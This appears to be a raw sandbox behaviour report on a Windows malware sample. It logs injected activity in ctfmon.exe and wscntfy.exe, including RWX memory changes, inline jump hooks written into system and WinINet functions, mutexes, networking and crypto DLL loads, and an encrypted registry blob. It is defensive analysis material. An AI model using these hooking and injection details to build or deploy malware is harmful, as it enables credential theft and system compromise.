Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999633052
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E42EA5E Length: 30 Value: 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 1999635495
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999636089
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E41AF7F Length: 30 Value: 8B FF 55 8B EC 8B 45 08 83 38 30 0F 85 0B E7 02 00 68 00 01 00 00 6A 00 6A 00 50 E8 C5 F1 success or wait 1999638546
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999639140
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999642455
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999646269
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999649295
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999652376
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999655475
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999658531
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999661588
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999664701
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999667685
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999670721
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999673711
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999676420
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999679672
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999686369
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999689379
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999692478
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999695477
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999698570
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999701483
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999704492
System info queried Type: ProcessInformation success or wait 1999713354
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: C20000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1999722469
Thread created PID: 1828 TID: 908 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\ctfmon.exe Injected: false success or wait 1999861973
Mutant created Name: \BaseNamedObjects\Local\{5B619F6A-A7F7-7417-185B-81F8EE8A3A3D} object name exists 1999863845
System info queried Type: ProcessInformation success or wait 1999865066
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: C20000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 1999871887
Thread created PID: 1828 TID: 2392 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\ctfmon.exe Injected: false success or wait 2000007198
Mutant created Name: \BaseNamedObjects\Global\{50BFCA5C-F2C1-7FC9-185B-81F8EE8A3A3D} success or wait 2000008222
Mutant created Name: \BaseNamedObjects\Local\{5B619F69-A7F4-7417-185B-81F8EE8A3A3D} object name exists 2000009071
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: Okmaykid success or wait 2000009578
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: Okmaykid success or wait 2000010111
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: Okmaykid Type: Binary Data: 96 8D 31 C9 C5 75 08 F8 84 53 9B D1 F4 B9 61 28 10 B5 F1 08 71 3F 43 D6 C5 E1 62 1A C6 5B 19 DC CC D6 C6 9D C6 B3 0A 3C 08 2E 18 33 00 4D BE 0B 36 BD B7 A3 BD 92 EA 03 1F E4 1B C7 16 2B 45 CA B5 08 9E BA 6B 0D 91 DA 05 B1 6F 8F BD 44 64 5A BF 72 4F 66 A5 9E C5 70 A4 30 85 A9 DA E1 B0 C2 84 42 08 3E FA A7 EC BB C8 A3 E1 74 73 02 2C 20 4D 52 81 9C success or wait 2000012139
Analysis File: wscntfy.exe PID: 236 Parent PID: 224
+ Sections
+ General
Start time: 06:06:44
Start date: 01/12/2011
Path: C:\WINDOWS\system32\wscntfy.exe
Commandline: C:\WINDOWS\system32\wscntfy.exe
Imagebase: 0x1000000
File size: 13824 bytes
MD5 hash: F92E1076C42FCD6DB3D72D8CFE9816D5
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.dat read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 AF46EA
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
none query and write and read commit E50000 12288 own pid read write success or wait 1
none query and write and read commit E90000 12288 own pid read write success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\WS2_32.dll write and read and execute unknown C20000 12288 own pid read write object name not found 1 AF4844
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1 AF4844
\KnownDlls\WS2HELP.dll write and read and execute unknown 71AB0000 94208 own pid read write object name not found 1 AF4844
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1 AF4844
\KnownDlls\CRYPT32.dll write and read and execute unknown 71AA0000 32768 own pid read write object name not found 1 AF4844
C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1 AF4844
\KnownDlls\MSASN1.dll write and read and execute unknown 77A80000 610304 own pid read write object name not found 1 AF4844
C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1 AF4844
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1 AF4844
\KnownDlls\Normaliz.dll write and read and execute unknown C10000 36864 own pid read write conflicting addresses 1 AF4844
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1 AF4844
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1 AF4844
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1 AF4844
\KnownDlls\NETAPI32.dll write and read and execute unknown 3DFD0000 2002944 own pid read write object name not found 1 AF4844
C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1 AF4844
Registry Activities:
+ Key value set
Key Path Name Type Data Completion Count Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Okmaykid Binary 96 8D 31 C9 C5 75 08 F8 84 53 9B D1 F4 B9 61 28 10 B5 F1 08 71 3F 43 D6 C5 E1 62 1A C6 5B 19 DC CC D6 C6 9D C6 B3 0A 3C 08 2E 18 33 00 4D BE 0B 36 BD B7 A3 BD 92 EA 03 1F E4 1B C7 16 2B 45 CA B5 08 9E BA 6B 0D 91 DA 05 B1 6F 8F BD 44 64 5A BF 72 4F 66 A5 9E C5 70 A4 30 85 A9 DA E1 B0 C2 84 42 08 3E FA A7 EC BB C8 A3 E1 74 73 02 2C 20 4D 52 81 9C success or wait 1 AF9F1A
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Enabled object name not found 1 AF9EC7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters EnabledV8 success or wait 1 AF9EC7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters CleanCookies success or wait 1 AF9FC6
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters CleanCookies success or wait 1 AF9EC7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters 1406 success or wait 5 AF9EC7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters 1609 success or wait 5 AF9EC7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Okmaykid success or wait 1 AF9F57
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Okmaykid success or wait 1 AF9F86
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\Local\{5B619F6A-A7F7-7417-185B-81F8EE8A3A3D} object name exists 1 AF4C09
\BaseNamedObjects\Global\{50BFCA5C-F2C1-7FC9-185B-81F8EE8A3A3D} success or wait 1 AEC0F6
\BaseNamedObjects\Local\{5B619F69-A7F4-7417-185B-81F8EE8A3A3D} object name exists 1 AF4C09
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
2508 236 7C8106F9 false C:\WINDOWS\system32\wscntfy.exe success or wait 1 AF9D4C
2516 236 7C8106F9 false C:\WINDOWS\system32\wscntfy.exe success or wait 1 AF9D4C
Memory Activities:
+ Memory read
PID Filepath Base Length Value Completion Count Source Address
236 C:\WINDOWS\system32\wscntfy.exe 7C90D1AE 30 B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7C91632D 30 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7C811195 30 8B FF 55 8B EC 83 EC 64 83 7D 0C 01 56 57 0F 8D 13 AE 01 00 33 F6 39 75 0C 0F 8C 08 AE 01 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 3D94FABE 30 8B FF 55 8B EC 51 51 53 56 33 DB 57 33 F6 33 FF 39 5D 08 89 5D FC 89 5D F8 0F 84 2A EB 03 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 3D95EE89 30 8B FF 55 8B EC 6A 10 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 19 FD FE FF 5D success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 3D9BA6BF 30 8B FF 55 8B EC 51 51 53 33 C0 21 45 FC 21 45 F8 56 57 33 FF 33 DB 33 C9 33 D2 39 45 08 75 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 3D9BA666 30 8B FF 55 8B EC 53 56 57 33 DB 33 C9 33 D2 33 F6 33 FF 39 5D 10 75 2C 8B 45 0C 85 C0 74 14 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 3D949088 30 8B FF 55 8B EC 51 51 53 56 57 33 DB 33 FF F6 05 78 11 9E 3D 01 89 5D FC 0F 84 D9 6A 01 00 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 3D94654B 30 8B FF 55 8B EC 83 EC 24 53 56 57 33 FF 39 3D B8 11 9E 3D 89 7D F4 89 7D F8 89 7D F0 C7 45 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 3D963381 30 8B FF 55 8B EC 83 EC 20 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC 89 5D F4 89 5D F8 C7 45 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 3D94BF83 30 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 3D94878D 30 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D F8 89 5D FC 0F 84 C3 65 04 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 71AB3E2B 30 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 71AB4C27 30 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 71AB68FA 30 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7E41ECA3 30 B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7E41FE6E 30 B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7E428D20 30 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7E42C17E 30 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7E423D3A 30 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7E43E577 30 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7E430833 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7E44F965 30 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7E430A47 30 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7E44F9B4 30 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7E42A01E 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7E42A97D 30 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 2A F6 FF FF 5D C2 14 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7E41A39A 30 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7E42EA5E 30 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 1 AFA4F3
236 C:\WINDOWS\system32\wscntfy.exe 7E41AF7F 30 8B FF 55 8B EC 8B 45 08 83 38 30 0F 85 0B E7 02 00 68 00 01 00 00 6A 00 6A 00 50 E8 C5 F1 success or wait 1 AFA4F3
+ Memory written
PID Filepath Base Length Value Completion Count Source Address
236 C:\WINDOWS\system32\wscntfy.exe E00000 10 B8 35 00 00 00 E9 A9 D1 B0 7B success or wait 1 AFA569
236 C:\WINDOWS\system32\wscntfy.exe 7C90D1AE 5 E9 33 B7 1D 84 success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe E0000A 10 68 6C 02 00 00 E9 1E 63 B1 7B success or wait 1 AFA569
236 C:\WINDOWS\system32\wscntfy.exe 7C91632D 5 E9 94 27 1D 84 success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe E00014 10 8B FF 55 8B EC E9 7C 11 A1 7B success or wait 1 AFA569
236 C:\WINDOWS\system32\wscntfy.exe 7C811195 5 E9 CE 79 2D 84 success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe E0001E 10 8B FF 55 8B EC E9 9B FA B4 3C success or wait 1 AFA569
236 C:\WINDOWS\system32\wscntfy.exe 3D94FABE 5 E9 97 45 1A C3 success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe E00028 10 8B FF 55 8B EC E9 5C EE B5 3C success or wait 1 AFA569
236 C:\WINDOWS\system32\wscntfy.exe 3D95EE89 5 E9 20 52 19 C3 success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe E00032 10 8B FF 55 8B EC E9 88 A6 BB 3C success or wait 1 AFA569
236 C:\WINDOWS\system32\wscntfy.exe 3D9BA6BF 5 E9 3E 9A 13 C3 success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe E0003C 10 8B FF 55 8B EC E9 25 A6 BB 3C success or wait 1 AFA569
236 C:\WINDOWS\system32\wscntfy.exe 3D9BA666 5 E9 33 9B 13 C3 success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe E00046 10 8B FF 55 8B EC E9 3D 90 B4 3C success or wait 1 AFA569
236 C:\WINDOWS\system32\wscntfy.exe 3D949088 5 E9 AD B1 1A C3 success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe E00050 10 8B FF 55 8B EC E9 F6 64 B4 3C success or wait 1 AFA569
236 C:\WINDOWS\system32\wscntfy.exe 3D94654B 5 E9 2D DD 1A C3 success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe E0005A 10 8B FF 55 8B EC E9 22 33 B6 3C success or wait 1 AFA569
236 C:\WINDOWS\system32\wscntfy.exe 3D963381 5 E9 36 0F 19 C3 success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe E00064 10 8B FF 55 8B EC E9 1A BF B4 3C success or wait 1 AFA569
236 C:\WINDOWS\system32\wscntfy.exe 3D94BF83 5 E9 7E 83 1A C3 success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe E0006E 10 8B FF 55 8B EC E9 1A 87 B4 3C success or wait 1 AFA569
236 C:\WINDOWS\system32\wscntfy.exe 3D94878D 5 E9 A0 BB 1A C3 success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe E00078 10 8B FF 55 8B EC E9 AE 3D CB 70 success or wait 1 AFA569
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
236 C:\WINDOWS\system32\wscntfy.exe D80000 C0F6A8 page read and write success or wait 1 AF4961
236 C:\WINDOWS\system32\wscntfy.exe D80000 C0F6AC page read and write success or wait 1 AF4961
236 C:\WINDOWS\system32\wscntfy.exe E00000 C0F47C page execute and read and write success or wait 1 AF1A36
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
236 C:\WINDOWS\system32\wscntfy.exe 7C90D1AE 1000 page execute and read and write page execute read success or wait 1 AFA4CC
236 C:\WINDOWS\system32\wscntfy.exe E00000 1000 page execute and read and write page execute and read and write success or wait 1 AFA569
236 C:\WINDOWS\system32\wscntfy.exe E00000 1000 page execute and read and write page execute and read and write success or wait 52 AFA569
236 C:\WINDOWS\system32\wscntfy.exe 7C90D1AE 1000 page execute and read and write page execute and write copy success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe 7C90D000 1000 page execute and write copy page execute and write copy success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe 7C90D1AE 1000 page execute read page execute and read and write success or wait 1 AFA5AD
236 C:\WINDOWS\system32\wscntfy.exe 7C91632D 1000 page execute and read and write page execute read success or wait 1 AFA4CC
236 C:\WINDOWS\system32\wscntfy.exe E0000A 1000 page execute and read and write page execute and read and write success or wait 1 AFA569
236 C:\WINDOWS\system32\wscntfy.exe 7C91632D 1000 page execute and read and write page execute and write copy success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe 7C916000 1000 page execute and write copy page execute and write copy success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe 7C91632D 1000 page execute read page execute and read and write success or wait 1 AFA5AD
236 C:\WINDOWS\system32\wscntfy.exe 7C811195 1000 page execute and read and write page execute read success or wait 1 AFA4CC
236 C:\WINDOWS\system32\wscntfy.exe E00014 1000 page execute and read and write page execute and read and write success or wait 1 AFA569
236 C:\WINDOWS\system32\wscntfy.exe 7C811195 1000 page execute and read and write page execute and write copy success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe 7C811000 1000 page execute and write copy page execute and write copy success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe 7C811195 1000 page execute read page execute and read and write success or wait 1 AFA5AD
236 C:\WINDOWS\system32\wscntfy.exe 3D94FABE 1000 page execute and read and write page execute read success or wait 1 AFA4CC
236 C:\WINDOWS\system32\wscntfy.exe E0001E 1000 page execute and read and write page execute and read and write success or wait 1 AFA569
236 C:\WINDOWS\system32\wscntfy.exe 3D94FABE 1000 page execute and read and write page execute and write copy success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe 3D94F000 1000 page execute and write copy page execute and write copy success or wait 1 AFA591
236 C:\WINDOWS\system32\wscntfy.exe 3D94FABE 1000 page execute read page execute and read and write success or wait 1 AFA5AD
236 C:\WINDOWS\system32\wscntfy.exe 3D95EE89 1000 page execute and read and write page execute read success or wait 1 AFA4CC
236 C:\WINDOWS\system32\wscntfy.exe E00028 1000 page execute and read and write page execute and read and write success or wait 1 AFA569
System Activities:
+ System information queried
System info class Completion Count Source Address
ProcessInformation success or wait 2 AF72E5
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: C20000 Size: 12288 Protection: read write Mapped to pid: own pid object name not found 2001653529
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 2001654987
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid object name not found 2001659123
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2001660561
Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 2001665470
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and write and read and execute Type: image Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 2001666863
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid object name not found 2001669840
Section loaded Path: C:\WINDOWS\system32\msasn1.dll Access: query and write and read and execute Type: image Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2001671320
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 2001682103
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: C10000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 2001687904
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 2001694887
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 2001698398
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 2001709736
Section loaded Path: \KnownDlls\NETAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid object name not found 2001829202
Section loaded Path: C:\WINDOWS\system32\netapi32.dll Access: query and write and read and execute Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 2001830598
Memory allocated PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: D80000 Length: C0F6A8 Allocation Type: null Protection: page read and write success or wait 2001836497
Memory allocated PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: D80000 Length: C0F6AC Allocation Type: null Protection: page read and write success or wait 2001836771
File opened Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.dat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2001911417
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: Enabled object name not found 2001912122
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: EnabledV8 success or wait 2001912691
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: CleanCookies success or wait 2001913251
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: CleanCookies success or wait 2001913814
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2001914389
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2001914967
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2001915552
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2001916128
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2001917114
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2001917812
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2001918400
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2001918969
